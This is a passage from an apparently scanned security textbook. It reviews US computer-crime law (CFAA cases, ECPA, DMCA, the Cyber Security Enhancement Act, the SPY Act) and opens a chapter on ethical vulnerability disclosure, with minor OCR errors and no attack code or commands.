send spam to customers if he wasn't paid $200,000 ( United States vs. Digati); a case 
(where the defendant received a seven-and-a-half year sentence) where a hacker sent 
e-mail threats to a state senator and other randomly selected victims ( United States vs. 
Tschiegg ); and the case against an e-mail hacker who broke into vice-presidential nomi- 
nee Sarah Palin's Yahoo! account during the 2008 presidential election ( United States 
vs. Kernel]). 

So many of these computer crimes happen today, they don't even make the news 
anymore. The lack of attention given to these types of crimes keeps them off the radar 
of many people, including the senior management of almost all corporations. If more 
people were aware of the amount of digital criminal behavior happening these days 
(prosecuted or not), security budgets would certainly rise. 

It is not clear that these crimes can ever be completely prevented as long as software 
and systems provide opportunities for such exploits. But wouldn't the better approach 
be to ensure that software does not contain so many flaws that can be exploited and 
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that continually cause these types of issues? That is why we wrote this book. We illus- 
trate the weaknesses in many types of software and show how these weaknesses can be 
exploited with the goal of the motivating the industry to work together — not just to 
plug holes in software, but to build the software right in the first place. Networks should 
not have a hard shell and a chewy inside — the protection level should properly extend 
across the enterprise and involve not only the perimeter devices. 

Disgruntled Employees 

Have you ever noticed that companies will immediately escort terminated employees 
out of the building without giving them the opportunity to gather their things or say 
goodbye to coworkers? On the technology side, terminated employees are stripped of 
their access privileges, computers are locked down, and often, configuration changes 
are made to the systems those employees typically accessed. It seems like a coldhearted 
reaction, especially in cases where an employee has worked for a company for many 
years and has done nothing wrong. Employees are often laid off as a matter of circum- 
stance, not due to any negative behavior on their part. Still, these individuals are told 
to leave and are sometimes treated like criminals instead of former valued employees. 

Companies have good, logical reasons to be careful in dealing with terminated and 
former employees, however. The saying "one bad apple can ruin a bushel" comes to 
mind. Companies enforce strict termination procedures for a host of reasons, many of 
which have nothing to do with computer security. There are physical security issues, 
employee safety issues, and, in some cases, forensic issues to contend with. In our mod- 
ern computer age, one important factor to consider is the possibility that an employee 
will become so vengeful when terminated that he will circumvent the network and use 
his intimate knowledge of the company's resources to do harm. It has happened to 
many unsuspecting companies, and yours could be next if you don't protect yourself. It 
is vital that companies create, test, and maintain proper employee termination proce- 
dures that address these situations specifically. 

Several cases under the CFAA have involved former or current employees. A pro- 
grammer was indicted on computer fraud charges after he allegedly stole trade secrets 
from Goldman Sachs, his former employer. The defendant switched jobs from Gold- 
man to another firm doing similar business, and on his last day is thought to have 
stolen portions of Goldman Sachs's code. He had also transferred files to his home 
computer throughout his tenure at Goldman Sachs. 

One problem with this kind of case is that it is very difficult to prove how much 
actual financial damage was done, making it difficult for companies injured by these 
acts to collect compensatory damages in a civil action brought under the CFAA. The 
CFAA does, however, also provide for criminal fines and imprisonment designed to dis- 
suade individuals from engaging in hacking attacks. 

In some intrusion cases, real damages can be calculated. In 2008, a hacker was sen- 
tenced to a year in prison and ordered to pay $54,000 in restitution after pleading 
guilty to hacking his former employer's computer systems. He had previously been IT 
manager at Akimbo Systems, in charge of building and maintaining the network, and 
had hacked into its systems after he was fired. Over a two-day period, he reconfigured 
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servers to send out spam messages, as well as deleted the contents of the organization's 
Microsoft Exchange database. 

In another example, a Texas resident was sentenced to almost three years in prison 
in early 2010 for computer fraud. The judge also ordered her to pay more than $ 1 mil- 
lion in restitution to Standard Mortgage Corporation, her former employer. The hacker 
had used the company's computer system to change the deposit codes for payments 
made at mortgage closings, and then created checks payable to herself or her creditors. 

These are just a few of the many attacks performed each year by disgruntled employ- 
ees against their former employers. Because of the cost and uncertainty of recovering 
damages in a civil suit or as restitution in a criminal case under the CFAA or other ap- 
plicable law, well-advised businesses put in place detailed policies and procedures for 
handling employee terminations, as well as the related implementation of access limita- 
tions to company computers, networks, and related equipment for former employees. 

Other Areas for the CFAA 

It's unclear whether or how the growth of social media might impact this statute. A 
MySpace cyber-bullying case is still making its way through appeal courts at the time of 
writing this book in 2010. Originally convicted of computer fraud, Lori Drew was later 
freed when the judge overturned her jury conviction. He decided her case did not meet 
the guidelines of CFAA abuse. Drew had created a fake MySpace account that she used 
to contact a teenage neighbor, pretending she was a love interest. The teenager later 
committed suicide. The prosecution in the case argued that violating MySpace's terms 
of service was a form of computer hacking fraud, but the judge did not agree when he 
acquitted Drew in 2009. 

In 2010, the first Voice over Internet Protocol (VoIP) hacking case was prosecuted 
against a man who hacked into VoIP-provider networks and resold the services for a 
profit. Edwin Pena pleaded guilty to computer fraud after a three-year manhunt found 
him in Mexico. He had used a VoIP network to route calls (more than 500,000) and hid 
evidence of his hack from network administrators. Prosecutors believed he sold more 
than 10 million Internet phone minutes to telecom businesses, leading to a $1.4 mil- 
lion loss to providers in under a year. 

State Law Alternatives 

The amount of damage resulting from a violation of the CFAA can be relevant for either 
a criminal or civil action. As noted earlier, the CFAA provides for both criminal and 
civil liability for a violation. A criminal violation is brought by a government official 
and is punishable by either a fine or imprisonment or both. By contrast, a civil action 
can be brought by a governmental entity or a private citizen and usually seeks the recov- 
ery of payment of damages incurred and an injunction, which is a court order to prevent 
further actions prohibited under the statute. The amount of damages is relevant for 
some but not all of the activities that are prohibited by the statute. The victim must 
prove that damages have indeed occurred. In this case, damage is defined as disruption 
of the availability or integrity of data, a program, a system, or information. For most 
CFAA violations, the losses must equal at least $5,000 during any one-year period. 
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This sounds great and may allow you to sleep better at night, but not all of the harm 
caused by a CFAA violation is easily quantifiable, or if quantifiable, might not exceed 
the $5,000 threshold. For example, when computers are used in distributed denial-of- 
service attacks or when processing power is being used to brute force and uncover an 
encryption key, the issue of damages becomes cloudy. These losses do not always fit 
into a nice, neat formula to evaluate whether they total $5,000. The victim of an attack 
can suffer various qualitative harms that are much harder to quantify. If you find your- 
self in this type of situation, the CFAA might not provide adequate relief. In that con- 
text, this federal statute may not be a useful tool for you and your legal team. 

An alternative path might be found in other federal laws, but even those still have 
gaps in coverage of computer crimes. To fill these gaps, many relevant state laws outlaw- 
ing fraud, trespass, and the like, which were developed before the dawn of cyberlaw, are 
being adapted, sometimes stretched, and applied to new crimes and old crimes taking 
place in a new arena — the Internet. Consideration of state law remedies can provide 
protection from activities that are not covered by federal law. 

Often victims will turn to state laws that may offer more flexibility when prosecut- 
ing an attacker. State laws that are relevant in the computer crime arena include both 
new state laws being passed by state legislatures in an attempt to protect their residents 
and traditional state laws dealing with trespassing, theft, larceny, money laundering, 
and other crimes. 

For example, if an unauthorized party accesses, scans, probes, and gathers data from 
your network or website, these activities may be covered under a state trespassing law. 
Trespass law covers not only the familiar notion of trespass on real estate, but also tres- 
pass to personal property (sometimes referred to as "trespass to chattels"). This legal 
theory was used by eBay in response to its continually being searched by a company 
that implemented automated tools for keeping up-to-date information on many differ- 
ent auction sites. Up to 80,000 to 100,000 searches and probes were conducted on the 
eBay site by this company, without eBay's consent. The probing used eBay's system re- 
sources and precious bandwidth, but was difficult to quantify. Plus, eBay could not 
prove that they lost any customers, sales, or revenue because of this activity, so the 
CFAA was not going to come to the company's rescue and help put an end to this activ- 
ity. So eBay's legal team sought relief under a state trespassing law to stop the practice, 
which the court upheld, and an injunction was put into place. 

Resort to state laws is not, however, always straightforward. First, there are 50 differ- 
ent states and nearly that many different "flavors" of state law. Thus, for example, tres- 
pass law varies from one state to the next, resulting in a single activity being treated in 
two very different ways under state law. For instance, some states require a demonstra- 
tion of damages as part of the claim of trespass (not unlike the CFAA requirement), 
whereas other states do not require a demonstration of damages in order to establish 
that an actionable trespass has occurred. 

Importantly, a company will usually want to bring a case to the courts of a state that 
has the most favorable definition of a crime so it can most easily make its case. Com- 
panies will not, however, have total discretion as to where they bring the case to court. 
There must generally be some connection, or nexus, to a state in order for the courts of 
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that state to have jurisdiction to hear a case. Thus, for example, a cracker in New Jersey 
attacking computer networks in New York will not be prosecuted under the laws of 
California, since the activity had no connection to that state. Parties seeking to resort to 
state law as an alternative to the CFAA or any other federal statute need to consider the 
available state statutes in evaluating whether such an alternative legal path is available. 
Even with these limitations, companies sometimes have to rely upon this patchwork 
quilt of different non-computer-related state laws to provide a level of protection simi- 
lar to the intended blanket of protection provided by federal law. 



TIP If you are considering prosecuting a computer crime that affected your 
company, start documenting the time people have to spend on the issue and 
other costs incurred in dealing with the attack.This lost paid employee time 
and other costs may be relevant in the measure of damages or, in the case 
of the CFAA or those states that require a showing of damages as part of a 
trespass case, to the success of the case. 

A case in Florida illustrates how victims can quantify damages resulting from com- 
puter fraud. In 2009, a hacker pled guilty to computer fraud against his former company, 

Quantum Technology Partners, and was sentenced to a year in prison and ordered to pay 
$31,500 in restitution. The defendant had been a computer support technician at Quan- 
tum, which served its clients by offering storage, e-mail, and scheduling. The hacker re- 
motely accessed the company's network late at night using an admin logon name and 
then changed the passwords of every IT administrator. Then the hacker shut down the 
company's servers and deleted files that would have helped restore tape backup data. 

Quantum quantified the damages suffered to come to the more than $30,000 fine the 
hacker paid. The costs included responding to the attack, conducting a damage assess- 
ment, restoring the entire system and data to their previous states, and other costs associ- 
ated with the interruption of network services, which also affected Quantum's clients. 

As with all of the laws summarized in this chapter, information security profession- 
als must be careful to confirm with each relevant party the specific scope and authoriza- 
tion for work to be performed. If these confirmations are not in place, it could lead to 
misunderstandings and, in the extreme case, prosecution under the Computer Fraud 
and Abuse Act or other applicable law. In the case of Sawyer vs. Department of Air Force, 
the court rejected an employee's claim that alterations to computer contracts were made 
to demonstrate the lack of security safeguards and found the employee liable, since the 
statute only required proof of use of a computer system for any unauthorized purpose. 

While a company is unlikely to seek to prosecute authorized activity, people who ex- 
ceed the scope of such authorization, whether intentionally or accidentally, run the risk 
being prosecuted under the CFAA and other laws. 

1 8 USC Sections 25 1 0, et. Seq., and 270 1 , et. Seq., of the 
Electronic Communication Privacy Act 

These sections are part of the Electronic Communication Privacy Act (ECPA), which is 
intended to protect communications from unauthorized access. The ECPA, therefore, 
has a different focus than the CFAA, which is directed at protecting computers and 
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network systems. Most people do not realize that the ECPA is made up of two main 
parts: one that amended the Wiretap Act and the other than amended the Stored Com- 
munications Act, each of which has its own definitions, provisions, and cases inter- 
preting the law. 

The Wiretap Act has been around since 1918, but the ECPA extended its reach to 
electronic communication when society moved in that direction. The Wiretap Act pro- 
tects communications, including wire, oral, and data during transmission, from unau- 
thorized access and disclosure (subject to exceptions). The Stored Communications Act 
protects some of the same types of communications before and/or after the commu- 
nications are transmitted and stored electronically somewhere. Again, this sounds sim- 
ple and sensible, but the split reflects a recognition that there are different risks and 
remedies associated with active versus stored communications. 

The Wiretap Act generally provides that there cannot be any intentional intercep- 
tion of wire, oral, or electronic communication in an illegal manner. Among the con- 
tinuing controversies under the Wiretap Act is the meaning of the word "interception." 
Does it apply only when the data is being transmitted as electricity or light over some 
type of transmission medium? Does the interception have to occur at the time of the 
transmission? Does it apply to this transmission and to where it is temporarily stored 
on different hops between the sender and destination? Does it include access to the 
information received from an active interception, even if the person did not participate 
in the initial interception? The question of whether an interception has occurred is 
central to the issue of whether the Wiretap Act applies. 

An example will help to illustrate the issue. Let's say I e-mail you a message that 
must be sent over the Internet. Assume that since A1 Gore invented the Internet, he has 
also figured out how to intercept and read messages sent over the Internet. Does the 
Wiretap Act state that A1 cannot grab my message to you as it is going over a wire? What 
about the different e-mail servers my message goes through (where it is temporarily 
stored as it is being forwarded)? Does the law say that A1 cannot intercept and obtain 
my message when it is on a mail server? 

Those questions and issues come down to the interpretation of the word "inter- 
cept." Through a series of court cases, it has been generally established that "intercept" 
only applies to moments when data is traveling, not when it is stored somewhere per- 
manently or temporarily. This gap in the protection of communications is filled by the 
Stored Communications Act, which protects this stored data. The ECPA, which amend- 
ed both earlier laws, therefore, is the "one-stop shop" for the protection of data in both 
states — during transmission and when stored. 

While the ECPA seeks to limit unauthorized access to communications, it recognizes 
that some types of unauthorized access are necessary. For example, if the government wants 
to listen in on phone calls, Internet communication, e-mail, network traffic, or you whis- 
pering into a tin can, it can do so if it complies with safeguards established under the 
ECPA that are intended to protect the privacy of persons who use those systems. 

Many of the cases under the ECPA have arisen in the context of parties accessing 
websites and communications in violation of posted terms and conditions or other- 
wise without authorization. It is very important for information security professionals 
and businesses to be clear about the scope of authorized access provided to various par- 
ties to avoid these issues. 
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In early 2010, a Gmail user brought a class-action lawsuit against Google and its 
new "Google Buzz" service. The plaintiff claimed that Google had intentionally ex- 
ceeded its authorization to control private information with Buzz. Google Buzz, a so- 
cial networking tool, was met with privacy concerns when it was first launched in 
February 2010. The application accessed Gmail users' contact lists to create "follower" 
lists, which were publicly viewable. They were created automatically, without the user's 
permission. After initial criticism, Google changed the automatic way lists were created 
and made other changes. It remains to be seen how the lawsuit will affect Google's lat- 
est creation. 

Interesting Application of ECPA 

Many people understand that as they go from site to site on the Internet, their browsing 
and buying habits are being collected and stored as small text files on their hard drives. 

These files are called cookies. Suppose you go to a website that uses cookies, looking for 
a new pink sweater for your dog because she has put on 20 pounds and outgrown her 
old one, and your shopping activities are stored in a cookie on your hard drive. When 
you come back to that same website, magically all of the merchant's pink dog attire is 
shown to you because the web server obtained that earlier cookie it placed your system, 
which indicated your prior activity on the site, from which the business derives what it 
hopes are your preferences. Different websites share this browsing and buying-habit 
information with each other. So as you go from site to site you may be overwhelmed 
with displays of large, pink sweaters for dogs. It is all about targeting the customer 
based on preferences and, through this targeting, promoting purchases. It's a great ex- 
ample of capitalists using new technologies to further traditional business goals. 

As it happens, some people did not like this "Big Brother" approach and tried to sue 
a company that engaged in this type of data collection. They claimed that the cookies 
that were obtained by the company violated the Stored Communications Act, because 
it was information stored on their hard drives. They also claimed that this violated the 
Wiretap Law because the company intercepted the users' communication to other web- 
sites as browsing was taking place. But the ECPA states that if one of the parties of the 
communication authorizes these types of interceptions, then these laws have not been 
broken. Since the other website vendors were allowing this specific company to gather 
buying and browsing statistics, they were the party that authorized this interception of 
data. The use of cookies to target consumer preferences still continues today. 

Trigger Effects of Internet Crime 

The explosion of the Internet has yielded far too many benefits to list in this writing. 

Millions and millions of people now have access to information that years before 
seemed unavailable. Commercial organizations, healthcare organizations, nonprofit 
organizations, government agencies, and even military organizations publicly disclose 
vast amounts of information via websites. In most cases, this continually increasing ac- 
cess to information is considered an improvement. However, as the world progresses in 
a positive direction, the bad guys are right there keeping up with and exploiting these 
same technologies, waiting for the opportunity to pounce on unsuspecting victims. 

Greater access to information and more open computer networks and systems have 
provided us, as well as the bad guys, with greater resources. 
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It is widely recognized that the Internet represents a fundamental change in how 
information is made available to the public by commercial and governmental entities, 
and that a balance must be continually struck between the benefits and downsides of 
greater access. In a government context, information policy is driven by the threat to 
national security, which is perceived as greater than the commercial threat to busi- 
nesses. After the tragic events of September 11, 2001, many government agencies began 
to reduce their disclosure of information to the public, sometimes in areas that were 
not clearly associated with national security. A situation that occurred near a Maryland 
army base illustrates this shift in disclosure practices. Residents near Aberdeen, Mary- 
land, had worried for years about the safety of their drinking water due to their suspi- 
cion that potential toxic chemicals were leaked into their water supply from a nearby 
weapons training center. In the years before the 9/11 attack, the army base had provided 
online maps of the area that detailed high-risk zones for contamination. However, 
when residents found out that rocket fuel had entered their drinking water in 2002, 
they also noticed that the maps the army provided were much different than before. 
Roads, buildings, and hazardous waste sites were deleted from the maps, making the 
resource far less effective. The army responded to complaints by saying the omission 
was part of a national security blackout policy to prevent terrorism. 

This incident was just one example of a growing trend toward information conceal- 
ment in the post-9/ 11 world, much of which affects the information made available on 
the Internet. All branches of the government have tightened their security policies. In 
years past, the Internet would not have been considered a tool that a terrorist could use 
to carry out harmful acts, but in today's world, the Internet is a major vehicle for anyone 
(including terrorists) to gather information and recruit other terrorists. 

Limiting information made available on the Internet is just one manifestation of 
the tighter information security policies that are necessitated, at least in part, by the 
perception that the Internet makes information broadly available for use or misuse. The 
Bush administration took measures to change the way the government exposes infor- 
mation, some of which drew harsh criticism. Roger Pilon, Vice President of Legal Affairs 
at the Cato Institute, lashed out at one such measure: "Every administration over-clas- 
sifies documents, but the Bush administration's penchant for secrecy has challenged 
due process in the legislative branch by keeping secret the names of the terror suspects 
held at Guantanamo Bay." 

According to the Report to the President from the Information Security Oversight 
Office Summary for Fiscal Year 2008 Program Activities, over 23 million documents 
were classified and over 31 million documents were declassified in 2005. In a separate 
report, they documented that the U.S. government spent more than $8.6 billion in se- 
curity classification activities in fiscal year 2008. 

The White House classified 44.5 million documents in 2001-2003. Original clas- 
sification activity — classifying information for the first time — saw a peak in 2004, at 
which point it started to drop. But overall classifications, which include new designa- 
tions along with classified information derived from other classified information, grew 
to the highest level ever in 2008. More people are now allowed to classify information 
than ever before. Bush granted classification powers to the Secretary of Agriculture, Sec- 
retary of Health and Human Services, and the administrator of the Environmental Pro- 
tection Agency. Previously, only national security agencies had been given this type of 
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privilege. However, in 2009, President Obama issued an executive order and memoran- 
dum expressing his plans to declassify historical materials and reduce the number of 
original classification authorities, with an additional stated goal of a more transparent 
government. 

The terrorist threat has been used "as an excuse to close the doors of the govern- 
ment" states OMB Watch Government Secrecy Coordinator Rick Blum. Skeptics argue 
that the government's increased secrecy policies don't always relate to security, even 
though that is how they are presented. Some examples include the following: 

• The Homeland Security Act of 2002 offers companies immunity from 
lawsuits and public disclosure if they supply infrastructure information 
to the Department of Homeland Security. 

• The Environmental Protection Agency (EPA) stopped listing chemical accidents 
on its website, making it very difficult for citizens to stay abreast of accidents 
that may affect them. 

• Information related to the task force for energy policies that was formed by 
Vice President Dick Cheney was concealed. 

• The Federal Aviation Administration (FAA) stopped disclosing information 
about action taken against airlines and their employees. 

Another manifestation of the Bush administration's desire to limit access to infor- 
mation in its attempt to strengthen national security was reflected in its support in 2001 
for the USA Patriot Act. That legislation, which was directed at deterring and punishing 
terrorist acts and enhancing law enforcement investigation, also amended many exist- 
ing laws in an effort to enhance national security. Among the many laws that it amend- 
ed are the CFAA (discussed earlier), under which the restrictions that were imposed on 
electronic surveillance were eased. Additional amendments also made it easier to pros- 
ecute cybercrimes. The Patriot Act also facilitated surveillance through amendments to 
the Wiretap Act (discussed earlier) and other laws. Although opinions may differ as to 
the scope of the provisions of the Patriot Act, there is no doubt that computers and the 
Internet are valuable tools to businesses, individuals, and the bad guys. 

Digital Millennium Copyright Act (DMCA) 

The DMCA is not often considered in a discussion of hacking and the question of in- 
formation security, but it is relevant. The DMCA was passed in 1998 to implement the 
World Intellectual Property Organization Copyright Treaty (WIPO Treaty). The WIPO 
Treaty requires treaty parties to "provide adequate legal protection and effective legal 
remedies against the circumvention of effective technological measures that are used by 
authors, " and to restrict acts in respect to their works that are not authorized. Thus, 
while the CFAA protects computer systems and the ECPA protects communications, the 
DMCA protects certain (copyrighted) content itself from being accessed without autho- 
rization. The DMCA establishes both civil and criminal liability for the use, manufac- 
ture, and trafficking of devices that circumvent technological measures controlling ac- 
cess to, or protection of, the rights associated with copyrighted works. 
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The DMCA's anti-circumvention provisions make it criminal to willfully, and for 
commercial advantage or private financial gain, circumvent technological measures 
that control access to protected copyrighted works. In hearings, the crime that the anti- 
circumvention provision is designed to prevent was described as "the electronic equiva- 
lent of breaking into a locked room in order to obtain a copy of a book." 

Circumvention is to "descramble a scrambled work... decrypt an encrypted work, or 
otherwise. . .avoid, bypass, remove, deactivate, or impair a technological measure, with- 
out the authority of the copyright owner." The legislative history provides that "if unau- 
thorized access to a copyrighted work is effectively prevented through use of a password, 
it would be a violation of this section to defeat or bypass the password." A "techno- 
logical measure" that "effectively controls access" to a copyrighted work includes mea- 
sures that, "in the ordinary course of its operation, requires the application of 
information, or a process or a treatment, with the authority of the copyright owner, to 
gain access to the work." Therefore, measures that can be deemed to "effectively control 
access to a work" would be those based on encryption, scrambling, authentication, or 
some other measure that requires the use of a key provided by a copyright owner to 
gain access to a work. 

Said more directly, the Digital Millennium Copyright Act (DMCA) states that no 
one should attempt to tamper with and break an access control mechanism that is put 
into place to protect an item that is protected under the copyright law. If you have cre- 
ated a nifty little program that will control access to all of your written interpretations 
of the grandness of the invention of pickled green olives, and someone tries to break 
this program to gain access to your copyright-protected insights and wisdom, the DMCA 
could come to your rescue. 

When down the road, you try to use the same access control mechanism to guard 
something that does not fall under the protection of the copyright law — let's say your 
uncopyrighted 15 variations of a peanut butter and pickle sandwich — you would get a 
different result. If someone were willing to extend the necessary resources to break your 
access control safeguard, the DMCA would be of no help to you for prosecution pur- 
poses because it only protects works that fall under the copyright act. 

These explanations sound logical and could be a great step toward protecting hu- 
mankind, recipes, and introspective wisdom and interpretations, but this seemingly 
simple law deals with complex issues. The DMCA also provides that no one can create, 
import, offer to others, or traffic in any technology, service, or device that is designed 
for the purpose of circumventing some type of access control that is protecting a copy- 
righted item. What's the problem? Let's answer that question by asking a broader ques- 
tion: Why are laws so vague? 

Laws and government policies are often vague so they can cover a wider range of 
items. If your mother tells you to "be good," this is vague and open to interpretation. 
But she is your judge and jury, so she will be able to interpret good from bad, which 
covers any and all bad things you could possibly think about and carry out. There are 
two approaches to laws and writing legal contracts: 

• Specifying exactly what is right and wrong, which does not allow for 
interpretation but covers a smaller subset of activities. 
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• Writing a more abstract law, which covers many more possible activities that 
could take place in the future, but is then wide open for different judges, 
juries, and lawyers to interpret. 

Most laws and contracts present a combination of more- and less-vague provisions, 
depending on what the drafters are trying to achieve. Sometimes the vagueness is inad- 
vertent (possibly reflecting an incomplete or inaccurate understanding of the subject), 
whereas, at other times, the vagueness is intended to broaden the scope of that law's 
application. 

Let's get back to the law at hand. If the DMCA indicates that no service can be offered 
that is primarily designed to circumvent a technology that protects a copyrighted work, 
where does this start and stop? What are the boundaries of the prohibited activity? 

The fear of many in the information security industry is that this provision could be 
interpreted and used to prosecute individuals carrying out commonly applied security 
practices. For example, a penetration test is a service performed by information security 
professionals where an individual or team attempts to break or slip by access control 
mechanisms. Security classes are offered to teach people how these attacks take place so 
they can understand what countermeasures are appropriate and why. Sometimes people 
are hired to break these mechanisms before they are deployed into a production environ- 
ment or go to market to uncover flaws and missed vulnerabilities. That sounds great: hack 
my stuff before I sell it. But how will people learn how to hack, crack, and uncover vulner- 
abilities and flaws if the DMCA indicates that classes, seminars, and the like cannot be 
conducted to teach the security professionals these skills? The DMCA provides an ex- 
plicit exemption allowing "encryption research" for identifying the flaws and vulnerabili- 
ties of encryption technologies. It also provides for an exception for engaging in an act of 
security testing (if the act does not infringe on copyrighted works or violate applicable 
law such as the CFAA), but does not contain a broader exemption covering a variety of 
other activities that information security professionals might engage in. Yep, as you pull 
one string, three more show up. Again, you see why it's important for information secu- 
rity professionals to have a fair degree of familiarity with these laws to avoid missteps. 

An interesting aspect of the DMCA is that there does not need to be an infringement 
of the work that is protected by the copyright law for prosecution under law to take 
place. So, if someone attempts to reverse-engineer some type of control and does noth- 
ing with the actual content, that person can still be prosecuted under this law. The 
DMCA, like the CFAA and the Access Device Statute, is directed at curbing unauthorized 
access itself, not at protecting the underlying work, which falls under the protection of 
copyright law. If an individual circumvents the access control on an e-book and then 
shares this material with others in an unauthorized way, she has broken the copyright 
law and DMCA. Two for the price of one. 

Only a few criminal prosecutions have been filed under the DMCA. Among 
these are: 

• A case in which the defendant pled guilty to paying hackers to break DISH 
network encryption to continue his satellite receiver business ( United States 
vs. Kwak). 
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• A case in which the defendant was charged with creating a software program 
that was directed at removing limitations put in place by the publisher of an 
e-book on the buyer's ability to copy, distribute, or print the book ( United 
States vs. Sklyarov). 

• A case in which the defendant pled guilty to conspiring to import, market, and 
sell circumvention devices known as modification (mod) chips. The mod chips 
were designed to circumvent copyright protections that were built into game 
consoles, by allowing pirated games to be played on the consoles ( United 
States vs. Rocci). 

There is an increasing movement in the public, academia, and from free speech 
advocates toward softening the DCMA due to the criminal charges being weighted 
against legitimate researchers testing cryptographic strengths (see http://w2.eff.org/ 
legal/cases/). While there is growing pressure on Congress to limit the DCMA, Congress 
took action to broaden the controversial law with the Intellectual Property Protection 
Act of 2006 and 2007, which would have made "attempted copyright infringement" 
illegal. Several versions of an Intellectual Property Enforcement Act were introduced in 
2007, but not made into law. A related bill, the Prioritizing Resources and Organization 
for Intellectual Property Act of 2008, was enacted in the fall of 2008. It mostly dealt 
with copyright infringement and counterfeit goods and services, and added require- 
ments for more federal agents and attorneys to work on computer-related crimes. 

Cyber Security Enhancement Act of 2002 

Several years ago, Congress determined that the legal system still allowed for too much 
leeway for certain types of computer crimes and that some activities not labeled "illegal" 
needed to be. In July 2002, the House of Representatives voted to put stricter laws in place, 
and to dub this new collection of laws the Cyber Security Enhancement Act (CSEA) of 
2002. The CSEA made a number of changes to federal law involving computer crimes. 

The act stipulates that attackers who carry out certain computer crimes may now get 
a life sentence in jail. If an attacker carries out a crime that could result in another's 
bodily harm or possible death, or a threat to public health or safety, the attacker could 
face life in prison. This does not necessarily mean that someone has to throw a server 
at another person's head, but since almost everything today is ran by some type of 
technology, personal harm or death could result from what would otherwise be a run- 
of-the-mill hacking attack. For example, if an attacker were to compromise embedded 
computer chips that monitor hospital patients, cause fire trucks to report to wrong ad- 
dresses, make all of the traffic lights change to green, or reconfigure airline controller 
software, the consequences could be catastrophic and under the CSEA result in the at- 
tacker spending the rest of her days in jail. 




NOTE In early 2010, a newer version of the Cyber Security Enhancement 
Act passed the House and is still on the docket for the Senate to take action, 
at the time of this writing. Its purpose includes funding for cybersecurity 
development, research, and technical standards. 
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The CSEA was also developed to supplement the Patriot Act, which increased the 
U.S. government's capabilities and power to monitor communications. One way in 
which this is done is that the CSEA allows service providers to report suspicious behavior 
without risking customer litigation. Before this act was put into place, service providers 
were in a sticky situation when it came to reporting possible criminal behavior or when 
trying to work with law enforcement. If a law enforcement agent requested information 
on a provider's customer and the provider gave it to them without the customer's knowl- 
edge or permission, the service provider could, in certain circumstances, be sued by the 
customer for unauthorized release of private information. Now service providers can 
report suspicious activities and work with law enforcement without having to tell the 
customer. This and other provisions of the Patriot Act have certainly gotten many civil 
rights monitors up in arms. It is another example of the difficulty in walking the fine line 
between enabling law enforcement officials to gather data on the bad guys and still al- 
lowing the good guys to maintain their right to privacy. 

The reports that are given by the service providers are also exempt from the Free- 
dom of Information Act, meaning a customer cannot use the Freedom of Information 
Act to find out who gave up her information and what information was given. This is- 
sue has also upset civil rights activists. 

Securely Protect Yourself Against Cyber Trespass 
Act (SPY Act) 

The Securely Protect Yourself Against Cyber Trespass (SPY Act) was passed by the House 
of Representatives, but never voted on by the Senate. Several versions have existed since 
2004, but the bill has not become law as of this writing. 

The SPY Act would provide many specifics on what would be prohibited and pun- 
ishable by law in the area of spyware. The basics would include prohibiting deceptive 
acts related to spyware, taking control of a computer without authorization, modifying 
Internet settings, collecting personal information through keystroke logging or without 
consent, forcing users to download software or misrepresenting what software would 
do, and disabling antivirus tools. The law also would decree that users must be told 
when personal information is being collected about them. 

Critics of the act thought that it didn't add any significant funds or tools for law en- 
forcement beyond what they were already able to do to stop cybercriminals. The Elec- 
tronic Frontier Foundation argued that many state laws, which the bill would override, 
were stricter on spyware than this bill was. They also believed that the bill would bar 
private citizens and organizations from working with the federal government against 
malicious hackers — leaving the federal government to do too much of the necessary 
anti-hacking work. Others were concerned that hardware and software vendors would 
be legally able to use spyware to monitor customers' use of their products or services. 

It is up to you which side of the fight you choose to play on — black or white hat — 
but remember that computer crimes are not treated as lightly as they were in the past. 
Trying out a new tool or pressing Start on an old tool may get into a place you never 
intended — jail. So as your mother told you — be good, and may the Force be with you. 
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CHAPTER 



Proper and Ethical 
Disclosure 



For years customers have demanded that operating systems and applications provide 
more and more functionality. Vendors continually scramble to meet this demand while 
also attempting to increase profits and market share. This combination of the race to 
market and maintaining a competitive advantage has resulted in software containing 
many flaws — flaws that range from mere nuisances to critical and dangerous vulnera- 
bilities that directly affect a customer's protection level. 

The hacker community's skill sets are continually increasing. It used to take the 
hacking community months to carry out a successful attack from an identified vulner- 
ability; today it happens in days or hours. 

The increase in interest and talent in the black-hat community equates to quicker 
and more damaging attacks and malware for the industry to combat. It is imperative 
that vendors not sit on the discovery of true vulnerabilities, but instead work to release 
fixes to customers who need them as soon as possible. 

For this to happen, ethical hackers must understand and follow the proper methods 
of disclosing identified vulnerabilities to the software vendor. If an individual uncovers 
a vulnerability and illegally exploits it and/or tells others how to carry out this activity, 
he is considered a black hat. If an individual uncovers a vulnerability and exploits it 
with authorization, she is considered a white hat. If a different person uncovers a vul- 
nerability, does not illegally exploit it or tell others how to do so, and works with the 
vendor to fix it, this person is considered a gray hat. 

Unlike other books and resources available today, we promote using the knowledge 
that we are sharing with you in a responsible manner that will only help the industry — 
not hurt it. To do this, you should understand the policies, procedures, and guidelines 
that have been developed to allow gray hats and the vendors to work together in a con- 
certed effort. These items have been created because of past difficulties in teaming up 
these different parties (gray hats and vendors) in a way that was beneficial. Many times 
individuals would identify a vulnerability and post it (along with the code necessary to 
exploit it) on a website without giving the vendor time to properly develop and release 
a fix. On the other hand, when an individual has tried to contact a vendor with useful 
information regarding a vulnerability, but the vendor has chosen to ignore repeated re- 
quests for a discussion pertaining to a particular weakness in a product, usually the in- 
dividual — who attempted to take a more responsible approach — posts the vulnerability 
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and exploitable code to the world. More successful attacks soon follow and the vendor 
then has to scramble to come up with a patch and meanwhile endure a hit to its rep- 
etition. 

So before you jump into the juicy attack methods, tools, and coding issues we cover 
in this book, make sure you understand what is expected of you once you uncover the 
security flaws in products today. There are enough people doing wrong things in the 
world. We are looking to you to step up and do the right thing. In this chapter, we'll 
discuss the following topics: 

• Different teams and points of view 

• CERT's current process 

• Full disclosure policy — the RainForest Puppy Policy 

• Organization for Internet Safety (OIS) 

• Conflicts will still exist 

• Case studies 

Different Teams and Points of View 

Unfortunately, almost all of today's software products are riddled with flaws. These 
flaws can present serious security concerns for consumers. For customers who rely ex- 
tensively on applications to perform core business functions, bugs can be crippling 
and, therefore, must be dealt with properly. How to address the problem is a compli- 
cated issue because it involves two key players who usually have very different views on 
how to achieve a resolution. 

The first player is the consumer. An individual or company buys a product, relies on 
it, and expects it to work. Often, the consumer owns a community of interconnected 
systems (a network) that all rely on the successful operation of software to do business. 

When the consumer finds a flaw, he reports it to the vendor and expects a solution in a 
reasonable timeframe. 

